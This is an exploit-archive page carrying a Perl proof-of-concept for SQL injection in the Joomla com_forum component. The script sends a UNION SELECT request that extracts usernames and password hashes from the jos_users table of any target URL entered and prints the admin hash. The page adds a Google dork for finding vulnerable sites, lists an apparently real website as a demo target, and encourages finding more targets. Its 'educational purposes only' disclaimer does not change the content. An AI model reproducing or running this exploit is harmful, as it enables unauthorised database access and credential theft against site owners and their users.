Joomla com_forum Remote SQL Injection Exploit



EKU-ID: 5356 CVE: OSVDB-ID:
Author: Dz MinD Injector Published: 2016-01-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


###
# Title : Joomla com_forum Remote SQL Injection Exploit
# Author : Dz MinD Injector
# Home : Algeria 23000 d^_^b
# FaCeb0ok : https://www.facebook.com/Dz.MinD.Injector
# Type : proof of concept
# Tested on : Windows7 & Linux
# Date : 21/01/2016
###
########################################################
#                                                      #
# $dzmind="Alla Happy birthay Frére Allah yahfdek";    #
# print $dzmind                                        #
########################################################
   
######## [ Proof / Exploit ] ################|=>
   
#! Google Dork :
#+ inrul:com_forum
  
  
#########################PrOof Of ConCept ##################################
  
#!/usr/bin/perl -w
  
########################################
#[~] Author : Dz MinD Injector
#[!] exploit Name: Joomla com_forum
#[+]Warning: I am not responsible for any damage you might cause!
#[+]Exploit written for educational purposes only.
########################################
print "\t\t                                                              \n\n";
print "\t\t        [~] Author : Dz MinD Injector                         \n\n";
print "\t\t                                                              \n\n";
print "\t\t                                                              \n\n";
print "\t\t [+]Warning: I am not responsible for any damage you might cause! \n\n";
print "\t\t                                                              \n\n";
print "\t\t                                                              \n\n";
print "\t\t     [!] exploit Name: com_forum Remote SQL Injection          \n\n";
  
  
use LWP::UserAgent;
print "\ Target page:[http://wwww.site.com/path/]: ";
chomp(my $target=<STDIN>);
$dzmind="concat(username,0x3a,password)";
$sakkure="jos_users";
$com="com_forum";
$cw="+UNION+SELECT+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=".$com."&Itemid=29&func=view&ind=317&catid=4".$cw."1,".$dzmind.",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/".$sakkure."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Successfully Injected #\n\n";
}
else{print "\n[-] Exploit Failed :( \n";
   
 ##Demo's :
   
http://www.aponey.fr/
   
!+ Find More targets in Google ^_^